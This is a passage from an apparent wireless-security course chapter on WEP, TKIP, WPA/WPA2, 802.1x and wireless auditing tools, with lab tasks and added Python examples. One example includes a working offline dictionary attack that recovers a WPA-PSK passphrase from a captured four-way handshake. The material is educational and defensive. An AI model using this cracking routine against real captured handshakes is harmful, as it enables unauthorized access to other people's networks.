10. Select Key 4 in the drop-down list, and type SECRET4 in the
Passphrase text box, then click the Apply button. You are now connected
to the WEP network.
11. If you wish, open a Command Prompt and ping 10.0.10.2 (the AP) to
verify the connection.
Temporal Key Integrity Protocol (TKIP)
TKIP is not specific to Wi-Fi Protected Access (WPA), but it is the cipher suite
that WPA uses. TKIP was developed to correct the weaknesses found in WEP's
use of RC4 without requiring new hardware. TKIP still uses RC4 as the core
cipher, but from there the process changes. TKIP derives a fresh RC4 key for
every packet by mixing the temporal key, the transmitter's MAC address and a
48-bit per-packet counter (which takes over the role of WEP's 24-bit IV), so a
keystream is never reused and the counter value visible on the air no longer
maps directly onto the key the way a WEP IV does. The temporal keys
themselves are also rotated periodically (the commonly quoted figure is every
10,000 packets).
Per-packet key mixing means that the previous problem of turning a 64-bit key
into a 24-bit plaintext IV and a 40-bit secret is now gone. TKIP also includes a
method of verifying the integrity of the data called the Message Integrity Check
(MIC). The MIC confirms that the packet has not been altered in transit, which
WEP's CRC-32 integrity check value could not do.
Although TKIP strengthens (rather than replaces) the WEP process, and raises
the security of network transmissions, it should not be considered the final
answer for securing wireless communication. In a pre-shared-key deployment the
system still falls to the cracking of the single password (or keyphrase) that was
used to initiate the whole system: if that secret is discovered, or guessed offline
from a captured handshake, the entire system is compromised.
Extensible Authentication Protocol (EAP)
Extensible Authentication Protocol (EAP) is not a wireless-specific protocol. EAP
is used in many different systems, both wired and wireless. EAP, in its simplest
definition, is a framework for authenticating a network access connection.
Note: TKIP is not a replacement for WEP.
EAP is not tied to a specic authentication technology, meaning that it will work
with certicates, smart cards, tokens, challenge/response systems, and so on. In
the case of wireless security, EAP has been applied to authenticating remote wire-
less users.
Wi-Fi Protected Access (WPA)
WEP is not the only option for securing your wireless communications. Another
is Wi-Fi Protected Access (WPA). Behind WPA is the Wi-Fi Alliance, an
organization deeply involved in wireless interoperability issues. WPA is
designed to meet two goals: strong access control via user authentication, and
strong protection via encryption.
The authentication goal is met with 802.1x plus the Extensible Authentication
Protocol (EAP). The encryption goal is met with three items: the Temporal Key
Integrity Protocol (TKIP), the Message Integrity Check (MIC), called Michael,
and 802.1x dynamic key distribution. This means
WPA = 802.1x + EAP + TKIP + MIC.
The WPA Process
There is a sequence of steps involved in the WPA process, and the steps differ
between an Enterprise implementation and a Small Office Home Office (SOHO)
implementation. In the SOHO implementation, a matching passphrase is
configured on the AP and the client. The passphrase itself is never sent over the
air: each side derives the same 256-bit pre-shared key from the passphrase and
the SSID, and in the four-way handshake that follows association each side
proves that it holds that key while the per-session encryption keys are derived
from it. Although authentication is simplified to the matching passphrase in the
SOHO implementation, the encryption process is the same for the SOHO as for
the Enterprise.
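How the SOHO (pre-shared key) case actually works, and why a single guessable passphrase compromises everything, as an added example in Python; this is not code from the course or from any vendor's WPA implementation. Both sides derive the PMK from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 rounds, 32 bytes), the four-way handshake derives the PTK from the PMK, the two MAC addresses and the two nonces, and message 2 carries a MIC computed with the first 16 bytes of the PTK. The MAC addresses, nonces and EAPOL-Key frame body below are constructed, and the SSID and passphrase are the ones the lab uses for SCP-3; the "password"/"IEEE" value is the published 802.11i Annex H test vector. The cracking loop is the offline dictionary attack that a captured handshake allows.

```python
"""WPA-PSK key derivation, 4-way handshake MIC, and offline passphrase guessing.

Added example with constructed handshake values; not code from the course.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes, version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame (the MIC field itself zeroed by the caller).

    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1-128.
    """
    algo = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame, algo).digest()[:16]


def handshake_mic(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol, version=2):
    """What the client puts in message 2: a MIC keyed with KCK = PTK[0:16]."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    ptk = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
    return eapol_mic(ptk[:16], eapol, version)


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol,
              captured_mic, version=2):
    """Offline dictionary attack: everything except the passphrase was sniffed."""
    for candidate in wordlist:
        mic = handshake_mic(candidate, ssid, ap_mac, sta_mac, anonce, snonce,
                            eapol, version)
        if hmac.compare_digest(mic, captured_mic):
            return candidate
    return None


# --- constructed handshake, using the lab's SSID and passphrase ---------------
SSID = "SCP-3"
AP_MAC = bytes.fromhex("001839aabbcc")        # constructed
STA_MAC = bytes.fromhex("00a0f89bb9aa")       # constructed
ANONCE = hashlib.sha256(b"anonce").digest()   # constructed 32-byte nonces
SNONCE = hashlib.sha256(b"snonce").digest()
EAPOL_MSG2 = bytes.fromhex("0103005f02010a00") + b"\x00" * 91   # constructed, MIC zeroed
CAPTURED_MIC = handshake_mic("SCNP4ME!", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2)

if __name__ == "__main__":
    print("PMK(password, IEEE) =", pmk_from_passphrase("password", "IEEE").hex())
    words = ["password", "linksys", "SCNP4ME!", "admin"]
    print("cracked passphrase:",
          crack_psk(words, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC))
```

Nothing in the derivation depends on the AP: an attacker who records one handshake can try passphrases at the cost of one PBKDF2 computation each, offline and with no further contact with the network, which is why the SOHO passphrase must be long and random rather than a dictionary word.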
Note: The formula for WPA is WPA = 802.1x + EAP + TKIP + MIC.
Figure 9-28: The Enterprise implementation steps of WPA.
In the Enterprise, there are several more steps in the overall process:
1. The client associates to the AP.
2. The AP blocks the client from the LAN segment until the client has
authenticated; only the EAP authentication traffic is passed through.
3. The client presents its authentication credentials to the authentication
server.
4. If the client authenticates successfully, the authentication server distributes
the required cryptographic keys to the AP and to the client. If the client does
not authenticate, it remains blocked from the LAN segment.
5. The client joins the LAN, using the keys to encrypt all communications
between the AP and the client.
Hardware Requirements
In order to take advantage of all that WPA offers, you will need to be sure that
your network is able to run WPA. Access Points and other wireless equipment
must support WPA. Most newer devices do, but older models may require
firmware or driver upgrades. In addition to the APs and clients supporting WPA,
the Enterprise mode requires an authentication server, typically a RADIUS server.
WEP and WPA Comparison
Although the technologies are different, there is a natural tendency to compare
WEP directly with WPA. Here is a quick comparison of some of the primary
points between these two security mechanisms.
WEP                          WPA
40-bit keys                  128-bit keys
Static key                   Dynamic keys
Manual key distribution      Automatic key distribution
Looking at those three points alone should provide ample reason for migrating
the enterprise to WPA as a security solution over WEP. A nal point is the
authentication systemsin WEP there is no unique authentication required by the
users, whereas in WPA the user must authenticate with the authentication server.
Configure WPA2
For this task, it is assumed that the initial WAP54G installation and configuration
is finished, and the task is specifically designed to configure WPA2. Once the AP
is configured to use WPA2, the WNICs will be configured to connect to the
WPA2-protected network.
TASK 9C-3
Configure WPA2 on the Access Point
1. Log on to your Windows 2003 Server as Administrator.
2. Open a web browser, and point to http://10.0.10.1 (or, if different, what-
ever IP Address you assigned to the WAP54G).
Leave the User Name empty, type admin as the Password, and then click
OK.
4. Click the Wireless tab, and under the Basic Wireless Settings, change the
Network Name (SSID) to SCP-3 and click the Save Settings button.
When you get the prompt that your changes have been saved, click
Continue.
5. On the Wireless tab, click the Wireless Security option.
6. In the Security Mode drop-down list, select WPA2-Mixed.
7. In the Passphrase text box, type SCNP4ME!
8. Click the Save Settings button. When you get the prompt that your
changes have been saved, click Continue.
Supplicants
While several makers of wireless networking equipment have made their cards
able to understand the higher-level security features, such as WPA, there are
issues currently in getting the WNIC to connect to the AP using WPA. The use of
supplicant applications helps to smooth out this process.
It is important to note that you may need to download a supplicant in order to get
WPA running on your system. The supplicant is the piece of code that allows
your card to actually use the features of WPA. This is especially true on
legacy systems, such as Windows 2000. Microsoft has released a WPA patch for
Windows systems, and Funk Software has released a third-party solution called
Odyssey.
With the AP now congured to use WPA2, you need to congure your client
computers to match this security setting. In this next task, you will congure the
Linksys WNIC client to use WPA2 security.
TASK 9C-4
Configuring WPA2 on the Network Client
1. Log on to the computer that has the Linksys WPC54G installed.
2. In the Windows system tray, right-click the Linksys WPC54G monitor
icon, and choose Open The Monitor.
3. Click the Site Survey tab. Notice the new WPA2 security-enabled AP is
listed.
4. Select the SCP-3 WPA2 secured network, and click Connect.
5. Verify that the WPA2-Personal option is selected, type SCNP4ME! in
the Passphrase text box, and click Connect.
6. In the Congratulations screen, click Connect To Network.
7. In the Link Information screen note that you are now connected to the
Access Point. Click the More Information button.
8. If you wish, open a Command Prompt and ping 10.0.10.1 (the AP) to
verify the connection.
802.1x
While industry groups such as the Wi-Fi Alliance work on security solutions, so
does the IEEE. The 802.11i task group was formed to address the security issues
of the 802.11 wireless networking standards. Its amendment, ratified in 2004 and
the basis of WPA2, adopts the existing IEEE 802.1x port-based network access
control standard as the authentication framework for 802.11-based networks.
The 802.1x standard is built on EAP, so it provides the flexibility to use
multiple authentication methods, and because it is an open standard, vendors are
able to implement and extend the technology along the lines of the standard.
In this system there are three primary components: the end client (the
supplicant), the access point (the authenticator, which keeps the client's port
blocked until authentication succeeds), and the authentication server. Although it
is common for the authentication server to be a RADIUS server, there is no
specification requiring RADIUS. This leaves the design open to fit your specific
situation.
Topic 9D
Wireless Auditing
Since the wireless network is so dynamic, in order to maintain proper security,
regular auditing is required. This is in addition to the normal auditing and analy-
sis of your wired network. Since the wireless network has no true boundary, your
auditing must be specically targeted towards this segment of the enterprise.
A complete audit of the wireless network should inform you of all of the APs, all
of the WNICs, and any other significant information, for example whether the
APs in the network are broadcasting their SSID. One method of attack is to add a
rogue AP at the edge of your network, extending its range across the street or
into another building. Without proper auditing, you may find this out only after
it is too late.
Site Survey
One of the primary, and most basic, wireless auditing tasks is the site survey.
This is a primary task because the wireless network is an ever-changing
network, with dynamic boundaries. Even if the nodes in the network remain
static, the bandwidth use may be dynamic, causing data rates to change during
the course of communication.
The BSS and ESS that are running in the wireless network can recongure them-
selves to use the lowest common denominator of bandwidth when associating
with nodes and other APs. Analyzing the packets on a given channel of an AP
can indicate the strength of the signal and the size of the packets transmitted.
If it seems that all the packets are small in size, then there is the possibility that
interference is causing the small size. Through your analysis you can now alter
the settings of the AP or move it to a different physical location.
WNIC Chipsets
Although not specic to the concept of auditing or the wireless network, you
need to be aware of the WNIC chipsets in order to utilize many of the wireless
auditing tools. The reason for this is that there are several different manufacturers
of wireless chipsets, and this is important because the tools and drivers are actu-
ally interacting with the chipset itself. When looking for interoperability with
your O/S or auditing tool, you may need to know which chipset is in your card,
and which chipsets are compatible with that specic tool.
For 802.11b networks, two common chipsets are Prism and Hermes. The Prism
chipset is on a wide variety of cards, such as Linksys, D-Link, and Netgear. The
Hermes chipset is often found in Proxim cards, specically the ORiNOCO cards.
Many wireless tools work best (and, for some tools, only) with the ORiNOCO
card.
For 802.11g networks, two common chipsets are Atheros and Broadcom. Many
different card vendors use these different chipsets. In this lesson, both the Linksys
and Netgear client cards use an Atheros chipset.
Wireshark
Wireshark is one of the leading network analysis tools, and runs on both Win-
dows and Linux platforms. Wireshark can capture all the packets seen by a
network card and present those packets for analysis. Complete details on
Wireshark network analysis are out of the scope of this book. Even though
Wireshark runs on both Windows and Linux, support for capturing raw 802.11
frames (monitor mode, which is needed to see management frames and the
802.11 headers) is better on Linux; on Windows, most wireless drivers hand
Wireshark only Ethernet-style frames.
NetStumbler
Perhaps one of the most famous wireless tools, NetStumbler should be a part of
every wireless auditing tool kit. NetStumbler works with a wide variety of cards;
a full compatibility list is available at www.stumbler.net/compat. This tool, once
loaded on your computer, can detect 802.11 networks, identify the SSIDs,
identify whether encryption is in place, identify the channel used, and so on.
There is a mapping function in NetStumbler that creates a graphical image, on a
map of the area, of the location of APs. Since the tool allows for GPS integra-
tion, you can even use a GPS device to identify the exact longitude and latitude
of the AP for plotting onto a map. Furthermore, you can output your results to
the mapping software MapPoint.
NetStumbler will identify, on screen, the SSIDs of the networks that it nds, and
will report whether or not that network is using WEP. If the AP is using WEP, a
small lock icon will appear in the circle next to the MAC address of the AP.
Installing NetStumbler is very simple, just execute the application and a desktop
icon will be created. Double-click the desktop icon, and NetStumbler is ready to
go. The only issue is making sure that the WNIC you use is supported by
NetStumbler. Supported cards require no additional steps, NetStumbler will sim-
ply use the card upon running the application. The web site,
www.netstumbler.com, is where you can go to nd the current updates regarding
the supported cards.
TASK 9D-1
Installing NetStumbler
1. Log on to the computer with the Linksys WPC54G installed.
2. On your course CD-ROM, navigate to C:\Tools\Lesson9\
NetStumblerInstaller_0_4_0.exe (note if you do not have this le, you
may download it from www.stumbler.net).
3. Double-click the NetStumblerInstaller_0_4_0.exe file to begin the installation.
4. Read the License Agreement, and click I Agree.
5. Leave the default selection of a Complete Install, and click Next.
6. Accept the default installation directory, and click Install.
7. Once the install is complete, click Close.
8. If you wish, read through the Release Notes, then close the Release Notes
window.
Identify Wireless Networks
After you have NetStumbler installed, you can quickly analyze your network to
nd active access points. Once you have identied an access point, you can dig a
bit deeper to determine the MAC address, the SSID, encryption use, signal
strength, and (if you have GPS connectivity) the longitude and latitude of the AP.
In the previous gure, you can see that NetStumbler has located three APs
nearby. NetStumbler has identied the SSID, Channel and MAC address. The
vendor name is estimated based on the MAC address, as specic MAC addresses
are assigned to specic vendors. This is not always accurate however, as MAC
addresses can be changed. In the test lab for this gure, two APs are Linksys, and
one is Netgear.
When using NetStumbler, you can tell whether you are associated with a
network by looking for a MAC address shown in bold. In the example figure,
the MAC address 0018390FFA5D is bolded, so the machine that created this
example is associated with the network on Channel 6 using SSID SCP-3.
Notice as well that NetStumbler has identified the encryption on both SCP-2 and
SCP-3 as WEP. SCP-2 is using WEP, but SCP-3 is using WPA2, so although
NetStumbler correctly identified that encryption was in use, it did not distinguish
a WEP network from a WPA2 network. The reason is that it reports the Privacy
bit from the beacon's capability field, which WEP, WPA and WPA2 all set; the
WPA and RSN information elements that would tell them apart are not examined.
You should keep this in mind as you use your wireless tools. While not
clearly defined from a legal viewpoint, connecting to an access point may be
considered unauthorized access. If your WNIC is set to DHCP, your system may
associate and be given an IP address very quickly. Be careful that you do
not associate with and join a network that you had no intention of using.
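A beacon decoder that makes the distinction NetStumbler does not, as an added example in Python; it is not NetStumbler's code and not part of the course. It reads the SSID, channel and Privacy bit the way a stumbler does, then classifies the network as Open, WEP, WPA or WPA2 from the information elements (the RSN element, ID 48, for WPA2 and the 00:50:F2 type 1 vendor element for WPA). The beacons it parses are constructed by build_beacon, the OUI table is a constructed lookup containing only the 00:18:39 prefix of the AP in the figure above, and the frame-control decode uses the same type and subtype numbering that Task 9D-4 has you read out of OmniPeek.

```python
"""Decode 802.11 beacons: SSID, channel, privacy bit and the real security type.

Added example with constructed beacons; not NetStumbler's or the course's code.
"""
import struct

SUBTYPES = {(0, 0): "Association Request", (0, 1): "Association Response",
            (0, 4): "Probe Request", (0, 5): "Probe Response", (0, 8): "Beacon",
            (0, 11): "Authentication", (1, 13): "Acknowledgement", (2, 0): "Data"}
CIPHERS = {2: "TKIP", 4: "CCMP"}            # 00-0F-AC suite selectors (802.11i)
AKMS = {1: "802.1X", 2: "PSK"}
OUI_TABLE = {"00:18:39": "Linksys"}         # constructed lookup for this example
RSN_OUI, WPA_OUI = b"\x00\x0f\xac", b"\x00\x50\xf2"


def frame_control(fc: int) -> dict:
    """Split the 16-bit frame control field (little-endian on the wire)."""
    flags = fc >> 8
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
            "protected": bool(flags & 0x40)}


def parse_ies(body: bytes):
    """Yield (element id, data) for each information element in the body."""
    pos = 0
    while pos + 2 <= len(body):
        eid, length = body[pos], body[pos + 1]
        yield eid, body[pos + 2: pos + 2 + length]
        pos += 2 + length


def parse_beacon(frame: bytes) -> dict:
    fc = frame_control(struct.unpack_from("<H", frame, 0)[0])
    kind = SUBTYPES.get((fc["type"], fc["subtype"]))
    if kind != "Beacon":
        raise ValueError(f"not a beacon: {kind}")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])          # address 3
    capability = struct.unpack_from("<H", frame, 24 + 10)[0]   # after timestamp, interval
    info = {"bssid": bssid, "vendor": OUI_TABLE.get(bssid[:8], "unknown"),
            "privacy": bool(capability & 0x0010),              # the bit stumblers report
            "ssid": "", "channel": None, "security": "Open"}
    for eid, data in parse_ies(frame[24 + 12:]):
        if eid == 0:
            info["ssid"] = data.decode(errors="replace") or "<hidden>"
        elif eid == 3:                                          # DS Parameter Set
            info["channel"] = data[0]
        elif eid == 48 and data[2:5] == RSN_OUI:                # RSN element: WPA2
            info["security"] = "WPA2"
            n_pair = struct.unpack_from("<H", data, 6)[0]
            info["pairwise"] = [CIPHERS.get(data[8 + 4 * i + 3], "?") for i in range(n_pair)]
            akm_off = 8 + 4 * n_pair
            n_akm = struct.unpack_from("<H", data, akm_off)[0]
            info["akm"] = [AKMS.get(data[akm_off + 2 + 4 * i + 3], "?") for i in range(n_akm)]
        elif eid == 221 and data[:4] == WPA_OUI + b"\x01" and info["security"] == "Open":
            info["security"] = "WPA"                            # vendor element: WPA1
    if info["security"] == "Open" and info["privacy"]:
        info["security"] = "WEP"      # privacy bit set, but no RSN or WPA element
    return info


def build_beacon(bssid: bytes, ssid: str, channel: int, mode: str) -> bytes:
    """Constructed beacon; mode is open, wep, wpa, wpa2 or wpa2-mixed."""
    privacy = 0x0010 if mode != "open" else 0
    header = struct.pack("<HH", 0x0080, 0) + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0001 | privacy)   # timestamp, interval, capability (ESS)
    ies = bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel])
    if mode in ("wpa", "wpa2-mixed"):
        wpa = (WPA_OUI + b"\x01\x01\x00" + WPA_OUI + b"\x02" + b"\x01\x00"
               + WPA_OUI + b"\x02" + b"\x01\x00" + WPA_OUI + b"\x02")
        ies += bytes([221, len(wpa)]) + wpa
    if mode in ("wpa2", "wpa2-mixed"):
        pairwise = [RSN_OUI + b"\x04"] + ([RSN_OUI + b"\x02"] if mode == "wpa2-mixed" else [])
        rsn = (b"\x01\x00" + RSN_OUI + b"\x02" + struct.pack("<H", len(pairwise))
               + b"".join(pairwise) + b"\x01\x00" + RSN_OUI + b"\x02" + b"\x00\x00")
        ies += bytes([48, len(rsn)]) + rsn
    return header + fixed + ies


if __name__ == "__main__":
    ap = bytes.fromhex("0018390ffa5d")
    for args in ((ap, "SCP-2", 6, "wep"), (ap, "SCP-3", 6, "wpa2-mixed"), (ap, "SCP-1", 11, "open")):
        print(parse_beacon(build_beacon(*args)))
```

Run against SCP-2 and SCP-3 style beacons, both report privacy=True (what NetStumbler shows as WEP) but only one carries an RSN element, so the classification comes out WEP for one and WPA2 for the other; the WPA2-Mixed beacon also lists both CCMP and TKIP as pairwise ciphers and PSK as the key management, which is what the Linksys "WPA2-Mixed" setting advertises.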
TASK 9D-2
Identifying Wireless Networks
1. Log on to the system that has NetStumbler installed.
2. Double-click the NetStumbler desktop icon. (If no icon was installed, you
can nd NetStumbler in your Programs menu.)
3. NetStumbler will automatically run a scan and locate active Access
Points within range of your system.
4. Examine the results and locate the following information:
What are the network types identied?
What are the channels used?
Is your system associated with any network?
Which networks are using encryption?
5. Close the NetStumbler application. At this time, there is no need to save
the le results, unless you wish to have them for later analysis.
OmniPeek Personal
There are many products designed to perform wireless network analysis directly,
and one of them is part of a bigger product called OmniPeek, a commercial prod-
uct from WildPackets. OmniPeek Personal can be downloaded for free, for
personal use only, from the WildPackets site: www.omnipeek.com. To use
OmniPeek in a commercial environment, you must buy a license for the
OmniPeek Workgroup or Enterprise products.
One thing OmniPeek Personal is not designed to do is to crack WEP. There are
other tools designed for this purpose. If you have WEP running in your network,
you can however, input the WEP keys and OmniPeek Personal will decrypt those
packets on screen. By decrypting the WEP signals, you can use OmniPeek Per-
sonal to analyze higher layer communications as well.
Note: If you have time, visit the site www.wigle.net. There is an interactive map that you can zoom in on, down to the level of seeing the names of individual SSIDs that have been discovered via wardriving.
Installation of OmniPeek Personal is very straightforward. OmniPeek Personal
will not work with every WNIC made, but supports quite a few brands and types
of cards. OmniPeek Personal supports various 802.11a, 802.11b, 802.11g, and
802.11 combo cards. You will need to be sure that your card is one that is
supported. Once you know that your card is supported, you will then update the
WNIC with a WildPackets driver for that specic card. Once the driver is
installed, then OmniPeek Personal is ready to run on your system.
TASK 9D-3
Installing OmniPeek Personal
Setup: OmniPeek Personal requires Microsoft .NET Framework 2.0. If your system does not have this installed, please visit www.omnipeek.com/downloads.php and follow the link to Microsoft to download the current version.
1. Log on to the system that has the Linksys WPC54G installed
2. From C:\Tools\Lesson9, double-click WildPackets_OmniPeek_
Personal41.exe.
3. If your security system generates a Security Warning pop-up, click Run. If
no pop-up is created, proceed to the next step.
4. In the InstallShield Wizard, click Next.
5. In the Name text box, type your first name; in the Company Name text
box, type SCP; and click Next.
6. If you wish to receive WildPackets updates, click Next. If you do not wish
to receive WildPackets updates, uncheck the check box, then click Next.
7. Read the features offered in the OmniPeek Workgroup Pro upgrade, and
click Next.
8. Read the terms of the License Agreement, select the radio button if you
accept, and click Next.
9. Read through the Installation Notes, and click Next.
10. If your system does not have Microsoft .NET Framework 2.0 installed, you
will be prompted to download .NET 2.0. If you do need to perform this
download, click OK. If your system already has .NET installed, skip to
the next step.
11. Leave the default selection of a Complete Install, and click Next.
12. Conrm your settings, and click Next to begin copying les. The software
will now be installed to your system.
13. Once the install is complete, uncheck the box to view the Readme,
uncheck the box to Launch OmniPeek, and click Finish.
WildPackets Drivers
OmniPeek Personal requires the installation of a special WildPackets driver in
order to use a wireless card with an Atheros chipset. Note, that once you have
installed the WildPackets driver, if you wish to revert to your previous congura-
tion, you will need to reinstall the factory drivers that came with your WNIC. In
this book, you will be using the OmniPeek les that are included as samples, so
no driver installation is required.
OmniPeek Personal Captures
OmniPeek Personal has several congured packet captures saved for you to use.
Viewing these sample captures will give you an insight into the process of using
OmniPeek Personal, without the requirement of you setting up a complex wire-
less lab. If you are going to move further in your career as a wireless network
analyst, you will build and manage your own lab, so this is not an issue, but for
the classroom, these captures are a great tool.
OmniPeek Personal can work as a network troubleshooting and maintenance tool,
in addition to providing the information you need to run security audits. The tool
can tell you bandwidth use, packet transmissions, and errors, all through its easy-
to-read visual gauges.
The full details of this tool are beyond the scope of this course, but one of the
features you will likely want to familiarize yourself with is the peer map. The
OmniPeek Personal peer map will help you to actually visualize the traffic in
your network. Connections are given colored lines, with the line getting thicker
based on utilization. In the peer map, you can grab a node with your mouse and
move it on screen, with the lines moving in relation, and allowing you to adjust
the view to your liking.
TASK 9D-4
Viewing OmniPeek Personal Captures
1. Log on to the system where you have installed OmniPeek Personal.
2. Navigate from the Start menu to the WildPackets OmniPeek Personal
installation.
3. The rst time the application runs, you must dene a network adapter. In
this course, you will not be using an adapter. In the Monitor Options screen,
select None, and click OK.
4. Choose File→Open.
5. Navigate to the folder location where you installed OmniPeek Personal.
Open \OmniPeek Personal\Samples\Wireless.
6. Select association.apc and click Open.
7. What is the function of the packet found in line 4?
It is the broadcast looking for a wireless network to join. This broadcast is
called the probe request.
8. What is the MAC address of the node that sent the Probe Request?
00:A0:F8:9B:B9:AA
9. What is the function of the packet found in line 5?
It is the response from the AP that it will accept connections. This response
is called the probe response.
10. What is the function of the packet found in line 8?
A request to use open authentication.
11. Right-click line 8 and choose Select Related Packets→By Flow. Click the
Hide Unselected button. You will be left with only the packets related to
that specific conversation.
12. What is the subtype of the authentication request in line 8?
It is Subtype: 1011 (Authentication).
13. What is the status code of the authentication response in line 10?
It is listed as Successful, so this packet is to inform the client that the
request is granted.
14. Choose Edit→Unhide All Packets.
15. Double-click line 3, which is a Beacon packet.
16. Note the type and subtype of this packet.
17. Click the green right-arrow. This arrow is found two rows under the File
menu.
18. What is the type and subtype of this packet?
Type 00 (Management) and 0100 (Probe Request).
Continue to click the green arrow, noting the different Types and Sub-
types, as they are associated to different packets.
19. What is the type and subtype for a probe response?
Type 00 (Management) and 0101 (Probe Response).
20. What is the type and subtype for an 802.11 acknowledgement?
Type 01 (Control) and 1101 (Acknowledgement).
21. What is the type and subtype for a beacon?
Type 00 (Management) and 1000 (Beacon).
22. What is the type and subtype for an 802.11 authentication packet?
Type 00 (Management) and 1011 (Authentication).
23. What is the type and subtype for an association request?
Type 00 (Management) and 0000 (Association Request).
24. What is the type and subtype for an association response?
Type 00 (Management) and 0001 (Association Response).
25. Choose File→Close to close the packet details.
26. From the left menu, under Statistics, click Protocols.
27. Notice the percentages of each protocol in this capture. When finished,
choose File→Close. Keep OmniPeek Personal open for subsequent tasks.
Live Captures
Although it may not be a part of your daily tasks, there will be times when you
wish to view captures as they happen. These live captures can then be saved for
later analysis, or you can look for trends as they are happening. There is a feature
built into the program to simulate the live capture of packets, so you do not need
to have a suitable WNIC installed.
TASK 9D-5
Viewing Live OmniPeek Personal Captures
1. Choose Capture→Start Capture.
2. In the Monitor Options, select the File option, and click OK.
3. In the File Name box, browse to \WildPackets\OmniPeek Personal\
Samples\Wireless\Demo.apc, and click Open. (Note you may need to
change the le type to view .apc les.)
4. Choose Capture→Start Capture.
5. Click the green Start Capture button.
6. Allow the capture to run for some time. When you reach approximately
700 packets, click the red Stop Capture button.
7. Leave the application open for upcoming tasks.
Non-802.11 Packets
Although you may wish to spend the majority of your time analyzing the 802.11 packets and associated wireless networking issues, OmniPeek Personal can capture all traffic. This allows you to perform analysis on all network traffic if you wish. In the following task, you will examine all the traffic captured, and view the OmniPeek Personal options for analysis.
TASK 9D-6
Analyze Upper Layer Traffic
Setup: This task assumes that the Demo.apc file is open.
1. Right-click line 16 and choose Select Related Packets→By Flow.
2. Click the Hide Unselected button.
3. What are the IP Addresses of the nodes in this conversation?
192.168.0.11
192.216.124.4
4. Which packets define the three-way handshake?
Packets 16, 19, and 21.
5. What website is being accessed in these packets?
www.wildpackets.com (This is the maker of OmniPeek Personal.)
6. Double-click any HTTP packet.
What is the type and subtype of the packet?
Type 10 (Data) and 0000 (Data Only).
7. Double-click line 23.
Looking at the MAC addresses and the last bit of the frame control flags, do you suspect this to be an ad-hoc or an infrastructure network?
An infrastructure network; there are three addresses in use, and the ToDS bit is set to 1.
8. Choose File→Close. Click No, as you do not need to save this capture file.
9. Leave OmniPeek Personal open for the next task.
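The flow selection and handshake questions in Task 9D-6 can be reproduced by hand. The following Python script is an added example, not part of the course or of OmniPeek Personal: it groups constructed packet summaries into bidirectional flows (what Select Related Packets→By Flow followed by Hide Unselected does), finds the SYN, SYN-ACK and ACK that define the three-way handshake, and lists the endpoints of the conversation. The two IP addresses are the ones from the task; the packet numbers, ports and flags are constructed to resemble the capture and are not taken from Demo.apc.

```python
"""Flow grouping and three-way handshake detection over constructed packet
summaries (added example; the addresses match Task 9D-6, everything else is
made up to resemble the capture)."""

# (number, protocol, src, sport, dst, dport, TCP flags as letters; "" for UDP)
PACKETS = [
    (14, "udp", "192.168.0.11", 1041, "192.168.0.1", 53, ""),        # DNS lookup, separate flow
    (16, "tcp", "192.168.0.11", 1042, "192.216.124.4", 80, "S"),    # SYN
    (17, "tcp", "192.168.0.22", 1100, "192.216.124.4", 80, "S"),    # another host, same server
    (19, "tcp", "192.216.124.4", 80, "192.168.0.11", 1042, "SA"),   # SYN-ACK
    (20, "tcp", "192.216.124.4", 80, "192.168.0.22", 1100, "SA"),
    (21, "tcp", "192.168.0.11", 1042, "192.216.124.4", 80, "A"),    # ACK completes handshake
    (22, "tcp", "192.168.0.11", 1042, "192.216.124.4", 80, "PA"),   # HTTP GET
    (23, "tcp", "192.216.124.4", 80, "192.168.0.11", 1042, "PA"),   # HTTP response
]

NUM, PROTO, SRC, SPORT, DST, DPORT, FLAGS = range(7)

def flow_key(pkt):
    """Direction-independent key: protocol plus the two endpoints in sorted order,
    so both halves of a conversation land in the same flow."""
    ends = sorted([(pkt[SRC], pkt[SPORT]), (pkt[DST], pkt[DPORT])])
    return (pkt[PROTO], ends[0], ends[1])

def select_related_by_flow(packets, number):
    """Equivalent of right-click -> Select Related Packets -> By Flow followed by
    Hide Unselected: every packet sharing a flow with packet `number`."""
    chosen = next(p for p in packets if p[NUM] == number)
    key = flow_key(chosen)
    return [p for p in packets if flow_key(p) == key]

def endpoints(flow):
    """The IP addresses taking part in the conversation."""
    return {p[SRC] for p in flow} | {p[DST] for p in flow}

def find_handshake(flow):
    """Return the packet numbers of the SYN, SYN-ACK and ACK, or None.
    The client is whoever sent the SYN; the server must answer from the
    SYN's destination, and the final ACK must come back from the client."""
    syn = synack = None
    for p in flow:
        if p[PROTO] != "tcp":
            return None
        if syn is None:
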